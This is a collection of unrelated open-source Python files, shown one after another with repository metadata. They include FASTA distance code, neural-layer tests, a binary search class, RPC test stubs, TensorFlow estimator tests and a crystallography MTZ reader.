if self.current_seqid != self.next_seqid:
# Reset the sequence
self.current_seqid = self.next_seqid
self.sequence = ""
# If fasta is finished, raise exception
if self.empty:
raise StopIteration()
# Otherwise, grab next line
try:
line = next(self.file)
# If FASTA is finished, set empty flag and return sequence
except StopIteration:
self.empty = True
return self.return_sequence()
# If there is a new sequence...
if line.startswith(">"):
# Extract the new sequence ID
self.next_seqid = line.lstrip(">").split()[0]
# If there is a current sequence ID...
if self.current_seqid:
# Return the current sequence
return self.return_sequence()
# If there is still the same sequence
else:
# Keep building it
self.sequence = self.sequence + line.strip()
# Dictionary to store distances
distances = {}
# Connect to the two fasta files via the generator and calculate distances
for seq_a in fasta(fasta_a):
for seq_b in fasta(fasta_b):
distances[frozenset([seq_a[0], seq_b[0]])] = LD(seq_a[1], seq_b[1])
# Write distances to outfile
with open(out_file, 'w') as o_f:
for d in distances.items():
output = list(d[0])*(1+len(d[0])%2) + [str(d[1])]
junk = o_f.write("\t".join(output) + "\n")
| 3.484375
| 3
|
test_layer.py
|
Marcel-Rodekamp/ComplexValuedNetworks
| 0
|
12778024
|
from layer import *
import itertools
# This file just tests the implementations in layer.py
if __name__ == "__main__":
def test_ACL(V):
# construct ACL with complex values
def amFactoryI(Nlayer, activation):
moduleList = []
for l in range(Nlayer-1):
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
# this makes the ACL to be the identity
torch.nn.init.zeros_(layer.weight)
torch.nn.init.zeros_(layer.bias)
moduleList.append(layer)
moduleList.append(activation())
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
torch.nn.init.zeros_(layer.weight)
torch.nn.init.zeros_(layer.bias)
moduleList.append(layer)
# no activation after the last layer
# we don't need the log det from these, therefore fall back to
# torchs' Sequential container
return torch.nn.Sequential(*moduleList)
for act in [torch.nn.Tanh, torch.nn.Softsign]:
for L in [1,2,4,16,32]:
ACL = createACL(amFactoryI,amFactoryI, Nlayer = L, activation = act)
x_A = torch.randn(V//2,dtype=torch.cdouble)
x_B = torch.randn(V//2,dtype=torch.cdouble)
with torch.no_grad():
y_A,logDetJ = ACL(x_A,x_B)
if not (x_A==y_A).all():
raise RuntimeError(f"{Nlayer} Layer ACL (V = {V}) is not initialized to the identity: x_A:\n {x_A} \n y_A:\n {y_A}")
# check that the logDetJ is zero
if not logDetJ == 0:
raise RuntimeError(f"{Nlayer} Layer ACL (V = {V}) has wrong logDetJ: logDetJ={logDetJ} != 0 ")
# Test Failed Successfully...
print("ACL Test successful")
def test_PRACL(V):
def amFactoryI(L, activation):
moduleList = []
for l in range(L-1):
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
# this makes the ACL to be the identity
torch.nn.init.zeros_(layer.weight)
torch.nn.init.zeros_(layer.bias)
moduleList.append(layer)
moduleList.append(activation())
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
torch.nn.init.zeros_(layer.weight)
torch.nn.init.zeros_(layer.bias)
moduleList.append(layer)
# no activation after the last layer
# we don't need the log det from these, therefore fall back to
# torchs' Sequential container
return torch.nn.Sequential(*moduleList)
def amFactoryR(L, activation):
moduleList = []
for l in range(L-1):
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
moduleList.append(layer)
moduleList.append(activation())
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
moduleList.append(layer)
# no activation after the last layer
# we don't need the log det from these, therefore fall back to
# torchs' Sequential container
return torch.nn.Sequential(*moduleList)
def PRACL_wrapper(myPRACL, inputTensor):
out,_ = myPRACL(inputTensor)
return out
# Test PRCL as identity
for act in [torch.nn.Tanh, torch.nn.Softsign]:
for LPRACL,LACL in itertools.product([1,2,4,16],repeat=2):
PRACL = createPRCL(V,LPRACL,
lambda *args,**kwargs: createACL(amFactoryI,amFactoryI,**kwargs),
L=LACL,activation=act # are passed as **kwargs to the lambda
)
x = torch.randn(V,dtype=torch.cdouble)
with torch.no_grad():
y,logDetJ = PRACL(x)
if not (x==y).all():
raise RuntimeError(f"{LPRACL}:{LACL} Layer PRACL (V = {V}) is not initialized to the identity: x_A:\n {x_A} \n y_A:\n {y_A}")
# check that the logDetJ is zero
if not logDetJ == 0:
raise RuntimeError(f"{LPRACL}:{LACL} Layer PRACL (V = {V}) has wrong logDetJ: logDetJ={logDetJ} != 0 ")
print("PRACL Identity Test successful")
# Test randomly initialized PRACL
for act in [torch.nn.Tanh, torch.nn.Softsign]:
for LPRACL,LACL in itertools.product([1,2],repeat=2):
PRACL = createPRCL(V,LPRACL,
lambda *args,**kwargs: createACL(amFactoryR,amFactoryR,**kwargs),
L=LACL,activation=act # are passed as **kwargs to the lambda
)
x = torch.randn(V,dtype=torch.cdouble)
xclone = x.clone();
with torch.no_grad():
y,logDetJ = PRACL(x)
# This call is numerical very unstable
# therefore, the following test sometimes fails
# not only on a precision level but also on orders of
# magnitude. We found a similar behaviour with log det
# in NSL. This is realy odd...
# I ran the test multiple times and most of the times it fails
# Even for real numbers (using .logdet) it sometimes fails
#sign,logabsdet = torch.autograd.functional.jacobian(
# lambda inTensor: PRACL_wrapper(PRACL,inTensor),
# x
#).slogdet()
#logDetJ_2 = torch.log(sign) + logabsdet
## check that the logDetJ match
#if not torch.isclose( torch.real(logDetJ),torch.real(logDetJ_2) ):
# raise RuntimeError(f"{LPRACL}:{LACL} Layer ACL (V = {V}) has wrong Re logDetJ: Re logDetJ={logDetJ.real:.20} != {logDetJ_2.real:.20} ")
#if not torch.isclose( torch.imag(logDetJ),torch.imag(logDetJ_2) ):
# raise RuntimeError(f"{LPRACL}:{LACL} Layer ACL (V = {V}) has wrong Im logDetJ: Im logDetJ={logDetJ.imag:.20} != {logDetJ_2.imag:.20} ")
print("PRACL Random Test successful")
for V in [2,4,16,32,128]:
test_ACL(V)
test_PRACL(V)
| 2.4375
| 2
|
{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/models.py
|
JuacyWillian/cookiecutter-kivymd
| 0
|
12778025
|
import enum
from datetime import datetime
from functools import reduce
from sqlalchemy import (create_engine)
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
database_uri = 'sqlite:///:memory:'
debug = False
db = create_engine(database_uri, echo=debug)
Base = declarative_base()
session = sessionmaker(bind=db)()
| 2.265625
| 2
|
tools/Verify.py
|
Zoctan/flask-api-seed
| 0
|
12778026
|
<reponame>Zoctan/flask-api-seed<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
def email(e):
if re.match("[a-zA-Z0-9]+@+[a-zA-Z0-9]+\.+[a-zA-Z]", e) is not None:
return True
return False
| 2.109375
| 2
|
comet/plugins/eventwriter.py
|
shinybrar/Comet
| 0
|
12778027
|
<reponame>shinybrar/Comet<filename>comet/plugins/eventwriter.py
# Comet VOEvent Broker.
# Example event handler: write an event to file.
import os
import string
from contextlib import contextmanager
from zope.interface import implementer
from twisted.plugin import IPlugin
from twisted.python import lockfile
from comet.icomet import IHandler, IHasOptions
import comet.log as log
# Used when building filenames to avoid over-writing.
FILENAME_PAD = "_"
def string_to_filename(input_string):
# Strip weird, confusing or special characters from input_string so that
# we can safely use it as a filename.
# Replace "/" and "\" with "_" for readability.
# Allow ".", but not as the first character.
if input_string[0] == ".":
input_string = input_string[1:]
return "".join(x for x in input_string.replace("/", "_").replace("\\", "_")
if x in string.digits + string.ascii_letters + "_."
)
@contextmanager
def event_file(ivoid, dirname=None):
# Return a file object into which we can write an event.
# If a directory is specified, write into that; otherwise, use the cwd.
# We use a lock to ensure we don't clobber other files with the same name.
if not dirname:
dirname=os.getcwd()
fname = os.path.join(dirname, string_to_filename(ivoid))
lock = lockfile.FilesystemLock(string_to_filename(ivoid) + "-lock")
lock.lock()
try:
while os.path.exists(fname):
fname += FILENAME_PAD
with open(fname, 'w') as f:
yield f
finally:
lock.unlock()
# Event handlers must implement IPlugin and IHandler.
# Implementing IHasOptions enables us to use command line options.
@implementer(IPlugin, IHandler, IHasOptions)
class EventWriter(object):
# Simple example of an event handler plugin. This saves the events to
# disk.
# The name attribute enables the user to specify plugins they want on the
# command line.
name = "save-event"
def __init__(self):
self.directory = os.getcwd()
# When the handler is called, it is passed an instance of
# comet.utility.xml.xml_document.
def __call__(self, event):
"""
Save an event to disk.
"""
if not os.path.exists(self.directory):
os.makedirs(self.directory)
with event_file(event.element.attrib['ivorn'], self.directory) as f:
log.debug("Writing to %s" % (f.name,))
f.write(event.raw_bytes.decode(event.encoding))
def get_options(self):
return [('directory', self.directory, 'Target directory')]
def set_option(self, name, value):
if name == "directory":
self.directory = value
# This instance of the handler is what actually constitutes our plugin.
save_event = EventWriter()
| 2.34375
| 2
|
src/__init__.py
|
ljusto/schmoobot
| 0
|
12778028
|
<reponame>ljusto/schmoobot
__author__ = '<NAME>'
| 0.851563
| 1
|
utils_v2/__init__.py
|
lamnguyen95/pyutils_v2
| 0
|
12778029
|
#!/usr/bin/env python3
from __future__ import absolute_import
from utils_v2.get_stats import *
| 1.078125
| 1
|
cauldron/session/writing/components/definitions.py
|
JohnnyPeng18/cauldron
| 90
|
12778030
|
import functools
import typing
from collections import namedtuple
COMPONENT = namedtuple('COMPONENT', ['includes', 'files'])
WEB_INCLUDE = namedtuple('WEB_INCLUDE', ['name', 'src'])
def merge_components(
*components: typing.Union[list, tuple, COMPONENT]
) -> COMPONENT:
"""
Merges multiple COMPONENT instances into a single one by merging the
lists of includes and files. Has support for elements of the components
arguments list to be lists or tuples of COMPONENT instances as well.
:param components:
:return:
"""
flat_components = functools.reduce(flatten_reducer, components, [])
return COMPONENT(
includes=functools.reduce(
functools.partial(combine_lists_reducer, 'includes'),
flat_components,
[]
),
files=functools.reduce(
functools.partial(combine_lists_reducer, 'files'),
flat_components,
[]
)
)
def flatten_reducer(
flattened_list: list,
entry: typing.Union[list, tuple, COMPONENT]
) -> list:
"""
Flattens a list of COMPONENT instances to remove any lists or tuples
of COMPONENTS contained within the list
:param flattened_list:
The existing flattened list that has been populated from previous
calls of this reducer function
:param entry:
An entry to be reduced. Either a COMPONENT instance or a list/tuple
of COMPONENT instances
:return:
The flattened list with the entry flatly added to it
"""
if hasattr(entry, 'includes') and hasattr(entry, 'files'):
flattened_list.append(entry)
elif entry:
flattened_list.extend(entry)
return flattened_list
def combine_lists_reducer(
key: str,
merged_list: list,
component: COMPONENT
) -> list:
"""
Reducer function to combine the lists for the specified key into a
single, flat list
:param key:
The key on the COMPONENT instances to operate upon
:param merged_list:
The accumulated list of values populated by previous calls to this
reducer function
:param component:
The COMPONENT instance from which to append values to the
merged_list
:return:
The updated merged_list with the values for the COMPONENT added
onto it
"""
merged_list.extend(getattr(component, key))
return merged_list
| 3.03125
| 3
|
Algorighms/Search/BinarySearch.py
|
zhangsifan/ClassicAlgorighthms
| 27
|
12778031
|
<reponame>zhangsifan/ClassicAlgorighthms
# -*- coding: utf-8 -*-#
'''
@Project : ClassicAlgorighthms
@File : BinarySearch.py
@USER : ZZZZZ
@TIME : 2021/4/22 10:21
'''
class BinarySearch():
'''
二分查找比较难的地方是如何确定左右边界,以及查找到元素时的左右边界的最终结果。
此处我将所有的边界全部设置为**闭区间**。只考虑这一种情况即可。
当然还有另一种情况为左闭右开,不过建议一条道走到黑,只要记住全部闭区间的情况即可。
查找准确目标是最简单的情形。
查找左侧边界与右侧边界时,需要进行一点特殊处理。
'''
def __init__(self):
pass
def SearchTarget(self, nums, target):
'''
查找单一目标
:param nums: 待查找的数组,已经排好序了
:param target: 查找目标
:return: 如果找到目标,返回目标索引;否则,返回-1
'''
left = 0
right = len(nums) - 1
# 都是闭区间,区间结束就是left > right
while left <= right:
mid = left + (right - left) // 2
if nums[mid] == target:
# 找到了,直接返回
return mid
elif nums[mid] > target:
# target肯定在左边,缩短右侧边界
right = mid - 1
elif nums[mid] < target:
# target肯定在右边,缩短左侧边界
left = mid + 1
# 这里如果能走到,就表示未能查找到
return -1
def SearchLeftBound(self, nums, target):
'''
nums中存在多个目标,查找最左侧的目标边界
:param nums: 待查找的数组,已经排好序了
:param target: 查找目标
:return: 如果找到目标,返回目标索引;否则,返回-1
'''
left = 0
right = len(nums) - 1
# 都是闭区间,查找结束就是left > right
while left <= right:
mid = left + (right - left) // 2
if nums[mid] == target:
# 找到了,先不急着返回,将区间继续往左移
right = mid - 1
elif nums[mid] > target:
# target肯定在左边,缩短右侧边界
right = mid - 1
elif nums[mid] < target:
# target肯定在右边,缩短左侧边界
left = mid + 1
# 最后出来后,这里到底有没有找到呢?
# 直接检查left是否越界,并检查它指向值
if left >= len(nums) or nums[left] != target:
return -1
return left
def SearchRightBound(self, nums, target):
'''
nums中存在多个目标,查找最左侧的目标边界
:param nums: 待查找的数组,已经排好序了
:param target: 查找目标
:return: 如果找到目标,返回目标索引;否则,返回-1
'''
left = 0
right = len(nums) - 1
# 都是闭区间,查找结束就是left > right
while left <= right:
mid = left + (right - left) // 2
if nums[mid] == target:
# 找到了,先不急着返回,将区间继续往右移
left = mid + 1
elif nums[mid] > target:
# target肯定在左边,缩短右侧边界
right = mid - 1
elif nums[mid] < target:
# target肯定在右边,缩短左侧边界
left = mid + 1
# 最后出来后,这里到底有没有找到呢?
# 直接检查right是否越界,并检查它指向值
if right < 0 or nums[right] != target:
return -1
return right
if __name__ == "__main__":
bs = BinarySearch()
nums = [1, 3, 5, 7, 9, 10, 11]
# 进行单目标二分查找
# 能查到的场景
res = bs.SearchTarget(nums, 7)
res_left_bound = bs.SearchLeftBound(nums, 7)
res_right_bound = bs.SearchRightBound(nums, 7)
print("能查到元素时: {}".format(res))
print("能查到元素时,左侧边界: {}, 右侧边界: {}".format(res_left_bound, res_right_bound))
# 查不到的场景
res = bs.SearchTarget(nums, 0)
print("查不到到元素时: {}".format(res))
# 进行左右侧边界的查找
# 整个目标在最左侧, 最右侧, 中间
nums1 = [1, 1, 1, 1, 3, 5, 7, 9, 10, 11]
nums2 = [1, 3, 5, 7, 9, 10, 11, 11, 11, 11]
nums3 = [1, 3, 4, 7, 7, 7, 7, 9, 10, 11]
# 对整个目标在最 左 侧进行左右侧边界查找
res_left_bound = bs.SearchLeftBound(nums1, 1)
res_right_bound = bs.SearchRightBound(nums1, 1)
print("当整个目标都在最左侧时,查找结果为: 左边界: {}, 右边界: {}".format(res_left_bound, res_right_bound))
# 对整个目标在最 右 侧进行左右侧边界查找
res_left_bound = bs.SearchLeftBound(nums2, 11)
res_right_bound = bs.SearchRightBound(nums2, 11)
print("当整个目标都在最右侧时,查找结果为: 左边界: {}, 右边界: {}".format(res_left_bound, res_right_bound))
# 对整个目标在 中间 时进行左右侧边界查找
res_left_bound = bs.SearchLeftBound(nums3, 7)
res_right_bound = bs.SearchRightBound(nums3, 7)
print("当整个目标都在中间时,查找结果为: 左边界: {}, 右边界: {}".format(res_left_bound, res_right_bound))
# 左右侧边界查不到的场景
res_not_found_left = bs.SearchLeftBound(nums1, 0)
res_not_found_right = bs.SearchRightBound(nums1, 20)
print("当左右侧边界查找不到时,左侧查找结果: {}, 右侧查找结果: {}".format(res_not_found_left, res_not_found_right))
| 2.921875
| 3
|
arekit/contrib/networks/context/configurations/att_ef_pcnn.py
|
nicolay-r/AREk
| 18
|
12778032
|
<filename>arekit/contrib/networks/context/configurations/att_ef_pcnn.py
from arekit.contrib.networks.context.configurations.att_ef_cnn import AttentionEndsAndFramesCNNConfig
class AttentionEndsAndFramesPCNNConfig(AttentionEndsAndFramesCNNConfig):
pass
| 1.25
| 1
|
modernrpc/tests/testsite/rpc_methods_stub/generic.py
|
germancollado/django-modern-rpc
| 89
|
12778033
|
<reponame>germancollado/django-modern-rpc<filename>modernrpc/tests/testsite/rpc_methods_stub/generic.py<gh_stars>10-100
# coding: utf-8
import datetime
from modernrpc.core import rpc_method, PROTOCOL_KEY
from modernrpc.exceptions import RPCException, RPC_CUSTOM_ERROR_BASE
from modernrpc.helpers import get_builtin_date
# In this file, some methods are decorated with @rpc_method without parenthesis, some
# are decorated with @rpc_method(). Both notations are supported and must works the same way
@rpc_method()
def add(a, b):
return a + b
@rpc_method
def divide(numerator, denominator, x=50, y=90, z=120, a=1, b=5, c=10):
"""
Divide a numerator by a denominator
:param numerator: The numerator
:param denominator: The denominator
:param x: useless, needed to check arguments ordering
:param y: useless, needed to check arguments ordering
:param z: useless, needed to check arguments ordering
:param a: useless, needed to check arguments ordering
:param b: useless, needed to check arguments ordering
:param c: useless, needed to check arguments ordering
:type numerator: int or double
:type denominator: int or double
:type x: int
:type y: int
:type z: int
:type a: int
:type b: int
:type c: int
:return:
:rtype: int or double
"""
return numerator / denominator
@rpc_method(name='customized_name')
def another_name():
"""This one will help to test method registration
when name has been customized"""
pass
class MyCustomException(RPCException):
def __init__(self):
super(MyCustomException, self).__init__(RPC_CUSTOM_ERROR_BASE + 5, 'This is a test error')
@rpc_method
def raise_custom_exception():
raise MyCustomException()
class MyCustomExceptionWithData(RPCException):
def __init__(self, data):
super(MyCustomExceptionWithData, self)\
.__init__(RPC_CUSTOM_ERROR_BASE + 5, 'This exception has additional data', data)
@rpc_method
def raise_custom_exception_with_data():
raise MyCustomExceptionWithData(['a', 'b', 'c'])
@rpc_method()
def add_one_month(date):
"""Adds 31 days to the given date, and returns the result."""
return get_builtin_date(date) + datetime.timedelta(days=31)
def existing_but_not_decorated():
"""This function help to validate only methods with decorator are effectively added to the registry"""
return 42 * 42
@rpc_method
def get_invalid_result():
"""Return an object instance that cannot be serialized in json or xml"""
from django.http.response import HttpResponse
return HttpResponse(content='dummy')
@rpc_method()
def method_with_kwargs(**kwargs):
return kwargs.get(PROTOCOL_KEY)
@rpc_method()
def method_with_kwargs_2(x, **kwargs):
return x, kwargs.get(PROTOCOL_KEY)
| 2.515625
| 3
|
boards/esp32/libraries/legacy/projects/wifi_http/02_rtc.py
|
iot49/IoT49
| 0
|
12778034
|
<gh_stars>0
from machine import RTC
rtc = RTC()
rtc.ntp_sync(server="hr.pool.ntp.org")
| 1.734375
| 2
|
tensorflow_estimator/python/estimator/export/function_test.py
|
cyc/estimator
| 2
|
12778035
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Estimator function objects."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import six as six
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.saved_model import load
from tensorflow.python.saved_model import save
from tensorflow.python.training import training
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_lib
from tensorflow_estimator.python.estimator.export import function
from tensorflow_estimator.python.estimator.mode_keys import ModeKeys
def _string_fix(obj):
return nest.map_structure(
lambda x: compat.as_bytes(x) if isinstance(x, six.string_types) else x,
obj)
def _model_fn(features, labels, mode):
v = variables.Variable(constant_op.constant(23), name='v')
if mode == ModeKeys.PREDICT:
return model_fn_lib.EstimatorSpec(
ModeKeys.PREDICT,
predictions=features + 1)
elif mode == ModeKeys.EVAL:
return model_fn_lib.EstimatorSpec(
ModeKeys.EVAL,
loss=constant_op.constant(5) + v,
predictions=features + labels)
elif mode == ModeKeys.TRAIN:
return model_fn_lib.EstimatorSpec(
ModeKeys.TRAIN,
predictions=features * labels,
loss=constant_op.constant(5) + v,
train_op=state_ops.assign_add(training.get_global_step(), 1))
def _model_fn_train_only(features, labels):
v = variables.Variable(constant_op.constant(23), name='v')
return model_fn_lib.EstimatorSpec(
ModeKeys.TRAIN,
predictions=features * labels,
loss=constant_op.constant(5) + v,
train_op=state_ops.assign_add(training.get_global_step(), 1))
def _model_fn_predict_only(features):
return model_fn_lib.EstimatorSpec(
ModeKeys.PREDICT,
predictions=features + 1)
# TODO(kathywu): Re-enable test after def_function changes are built into
# nightlies.
@test_util.run_all_in_graph_and_eager_modes
class ModelFunctionTest(object):
def test_from_function(self):
mfn = function.ModelFunction.from_function(_model_fn)
out = mfn.train(constant_op.constant(3), constant_op.constant(5))
self.evaluate(variables.variables_initializer(mfn.variables.values()))
self.assertEqual(15, self.evaluate(out['predictions']))
out = mfn.evaluate(constant_op.constant(7), constant_op.constant(9))
self.assertEqual(16, self.evaluate(out['predictions']))
out = mfn.predict(constant_op.constant(10))
self.assertEqual(11, self.evaluate(out['predictions']))
def test_model_fn_train_only(self):
mfn = function.ModelFunction()
mfn.add_mode(_model_fn_train_only, ModeKeys.TRAIN)
out = mfn.train(constant_op.constant(4), constant_op.constant(6))
self.evaluate(variables.variables_initializer(mfn.variables.values()))
self.assertEqual(24, self.evaluate(out['predictions']))
with self.assertRaisesRegexp(ValueError, 'not defined'):
out = mfn.evaluate(constant_op.constant(7), constant_op.constant(9))
def test_model_fn_predict_only(self):
mfn = function.ModelFunction()
mfn.add_mode(_model_fn_predict_only, ModeKeys.PREDICT)
out = mfn.predict(constant_op.constant(4))
self.evaluate(variables.variables_initializer(mfn.variables.values()))
self.assertEqual(5, self.evaluate(out['predictions']))
with self.assertRaisesRegexp(ValueError, 'not defined'):
out = mfn.evaluate(constant_op.constant(7), constant_op.constant(9))
def test_save_and_load(self):
mfn = function.ModelFunction.from_function(_model_fn)
out = mfn.train(constant_op.constant(3), constant_op.constant(5))
self.evaluate(variables.variables_initializer(mfn.variables.values()))
self.evaluate(out['predictions'])
for _ in range(2):
out = mfn.train(constant_op.constant(3), constant_op.constant(5))
self.evaluate(out['predictions'])
self.assertEqual(
3, self.evaluate(mfn._variable_holder.variables['global_step']))
mfn.evaluate(constant_op.constant(7), constant_op.constant(9))
mfn.predict(constant_op.constant(10))
save_dir = os.path.join(self.get_temp_dir(), 'model_function')
save.save(mfn, save_dir)
obj = load.load(save_dir)
variables_by_name = obj._variables_by_name
self.evaluate(variables.variables_initializer(
variables_by_name._unconditional_dependency_names.values()))
self.assertEqual(3, self.evaluate(variables_by_name.global_step))
out = obj._functions['train'](constant_op.constant(3),
constant_op.constant(5))
self.assertEqual(15, self.evaluate(out['predictions']))
self.assertEqual(4, self.evaluate(variables_by_name.global_step))
out = obj._functions['eval'](constant_op.constant(7),
constant_op.constant(9))
self.assertEqual(16, self.evaluate(out['predictions']))
out = obj._functions['infer'](constant_op.constant(10))
self.assertEqual(11, self.evaluate(out['predictions']))
def _model_fn_callable_variable_initializers(features, labels, mode):
"""Model_fn with callable variable initializers (for WrappedGraph tests)."""
_ = features, labels
v = variables.Variable(lambda: constant_op.constant(23), name='v')
if mode == ModeKeys.PREDICT:
return model_fn_lib.EstimatorSpec(
ModeKeys.PREDICT,
predictions=features + 1)
elif mode == ModeKeys.EVAL:
return model_fn_lib.EstimatorSpec(
ModeKeys.EVAL,
loss=constant_op.constant(5) + v,
predictions=features + labels)
elif mode == ModeKeys.TRAIN:
return model_fn_lib.EstimatorSpec(
ModeKeys.TRAIN,
predictions=features * labels,
loss=constant_op.constant(5) + v,
train_op=state_ops.assign_add(training.get_global_step(), 1))
@test_util.run_all_in_graph_and_eager_modes
class EstimatorWrappedGraphTest(test.TestCase):
def test_wrap_model_fn_train(self):
graph = function._EstimatorWrappedGraph()
features = constant_op.constant(3)
labels = constant_op.constant(4)
mode = ModeKeys.TRAIN
fn = graph.wrap_model_fn(
_model_fn_callable_variable_initializers,
mode=mode, args=[features, labels, mode], kwargs={})
self.evaluate(variables.variables_initializer(graph.variables.values()))
self.assertEqual(0, self.evaluate(graph.global_step))
self.assertEqual(12, self.evaluate(fn(features, labels)['predictions']))
self.assertEqual(1, self.evaluate(graph.global_step))
self.assertEqual('AssignAddVariableOp',
graph.estimator_spec.train_op.type)
def test_wrap_model_fn_eval(self):
graph = function._EstimatorWrappedGraph()
features = constant_op.constant(5)
labels = constant_op.constant(6)
mode = ModeKeys.EVAL
fn = graph.wrap_model_fn(
_model_fn_callable_variable_initializers,
mode=mode, args=[features, labels, mode], kwargs={})
self.assertDictEqual({'predictions': 11},
self.evaluate(fn(features, labels)))
def test_wrap_model_fn_predict(self):
graph = function._EstimatorWrappedGraph()
features = constant_op.constant(7)
mode = ModeKeys.PREDICT
fn = graph.wrap_model_fn(
_model_fn_callable_variable_initializers,
mode=mode, args=[features, None, mode], kwargs={})
self.assertDictEqual({'predictions': 8},
self.evaluate(fn(features)))
def test_wrap_input_receiver_fn(self):
def serving_input_fn():
receiver_1 = array_ops.placeholder(dtypes.string)
receiver_2 = array_ops.placeholder(dtypes.string)
receiver_tensors = {
'rec1': receiver_1,
u'rec2': receiver_2,
}
concat = string_ops.string_join([receiver_1, receiver_2])
concat2 = array_ops.identity(concat)
features = {
'feature0': string_ops.string_join([concat, concat2], ':'),
u'feature1': constant_op.constant([1])
}
alternate_tensors = {
'alt_name_1': concat,
'alt_name_2': {
'tensor1': concat,
'tensor2': concat2}
}
return export_lib.ServingInputReceiver(
features, receiver_tensors, alternate_tensors)
graph = function._EstimatorWrappedGraph()
fns = graph.wrap_input_receiver_fn(serving_input_fn)
for fn, name in fns:
if name is None:
out = fn(constant_op.constant('1'), constant_op.constant('2'))
self.assertDictEqual(
_string_fix({'feature0': '12:12', 'feature1': [1]}),
_string_fix(self.evaluate(out)))
elif name == 'alt_name_1':
out = fn(constant_op.constant('3'))
self.assertDictEqual(
_string_fix({'feature0': '3:3', 'feature1': [1]}),
_string_fix(self.evaluate(out)))
elif name == 'alt_name_2':
out = fn(constant_op.constant('4'), constant_op.constant('5'))
self.assertDictEqual(
_string_fix({'feature0': '4:5', 'feature1': [1]}),
_string_fix(self.evaluate(out)))
if __name__ == '__main__':
test.main()
| 1.625
| 2
|
1_beginner/chapter4/solutions/menu.py
|
code4tomorrow/Python
| 4
|
12778036
|
"""
A restaurant menu has food and drink sections,
each from which the customer must choose an order.
By default, any combination of food and drink orders
are $1,000,000,000.
But if the customer enters 'french toast'
AND 'coffee', there is a discount of $1.
Otherwise, if the customer enters 'chicken soup' OR 'apple juice',
the price increases by $1.
Write a program that takes an order from a user
and prints out the appropriate price.
Assume that all inputs are in lowercase
and that it is always food first, and then drink.
"""
# all orders are $1 million by default
total_cost = 1_000_000_000 # underscores to increase readability
# take the user's order
food = input("What food would you like? ")
drink = input("What drink would you like? ")
# discount of $1 if the user orders french toast and coffee
if food == "french toast" and drink == "coffee":
total_cost -= 1
# charge extra $1 if user orders chicken soup or apple juice
elif food == "chicken soup" or drink == "apple juice":
total_cost += 1
# display total
print("Total cost: $" + str(total_cost))
| 4.25
| 4
|
src/xia2/Modules/Mtzdump.py
|
graeme-winter/xia2
| 10
|
12778037
|
<reponame>graeme-winter/xia2
# A replacement for the wrapper for the CCP4 program MTZDUMP using CCTBX
# to access the file directly.
import copy
import os
from iotbx import mtz
class Mtzdump:
"""A class to give the same functionality as the wrapper for the CCP4
MTZDUMP program."""
def __init__(self):
self._header = {"datasets": [], "dataset_info": {}}
self._batch_header = {}
self._batches = None
self._reflections = 0
self._resolution_range = (0, 0)
def set_working_directory(self, wd):
pass
def get_working_directory(self):
return None
def set_hklin(self, hklin):
self._hklin = hklin
def dump(self):
"""Actually obtain the contents of the mtz file header."""
assert self._hklin, self._hklin
assert os.path.exists(self._hklin), self._hklin
mtz_obj = mtz.object(self._hklin)
# work through the file acculumating the necessary information
self._header["datasets"] = []
self._header["dataset_info"] = {}
self._batches = [batch.num() for batch in mtz_obj.batches()]
self._header["column_labels"] = [column.label() for column in mtz_obj.columns()]
self._header["column_types"] = [column.type() for column in mtz_obj.columns()]
self._resolution_range = mtz_obj.max_min_resolution()
self._header["spacegroup"] = mtz_obj.space_group_name()
self._reflections = mtz_obj.n_reflections()
for crystal in mtz_obj.crystals():
if crystal.name() == "HKL_base":
continue
pname = crystal.project_name()
xname = crystal.name()
cell = crystal.unit_cell().parameters()
for dataset in crystal.datasets():
dname = dataset.name()
wavelength = dataset.wavelength()
dataset_id = f"{pname}/{xname}/{dname}"
dataset_number = dataset.i_dataset()
assert dataset_id not in self._header["datasets"]
self._header["datasets"].append(dataset_id)
self._header["dataset_info"][dataset_id] = {}
self._header["dataset_info"][dataset_id]["wavelength"] = wavelength
self._header["dataset_info"][dataset_id]["cell"] = cell
self._header["dataset_info"][dataset_id]["id"] = dataset_number
def get_columns(self):
"""Get a list of the columns and their types as tuples
(label, type) in a list."""
return [
(cl, self._header["column_types"][i])
for i, cl in enumerate(self._header["column_labels"])
]
def get_resolution_range(self):
return self._resolution_range
def get_datasets(self):
"""Return a list of available datasets."""
return self._header["datasets"]
def get_dataset_info(self, dataset):
"""Get the cell, spacegroup & wavelength associated with
a dataset. The dataset is specified by pname/xname/dname."""
result = copy.deepcopy(self._header["dataset_info"][dataset])
result["spacegroup"] = self._header["spacegroup"]
return result
def get_spacegroup(self):
"""Get the spacegroup recorded for this reflection file."""
return self._header["spacegroup"]
def get_batches(self):
"""Get a list of batches found in this reflection file."""
return self._batches
def get_reflections(self):
"""Return the number of reflections found in the reflection
file."""
return self._reflections
| 2.453125
| 2
|
Chapter12/old_12/BankSubscriberEDA.py
|
amirziai/Hands-on-Artificial-Intelligence-with-TensorFlow-Book
| 10
|
12778038
|
'''
Created on 10-Jul-2018
@author: <NAME>
'''
# We will use seaborn to create plots
import seaborn as sns
# Matplotlib will help us to draw the plots
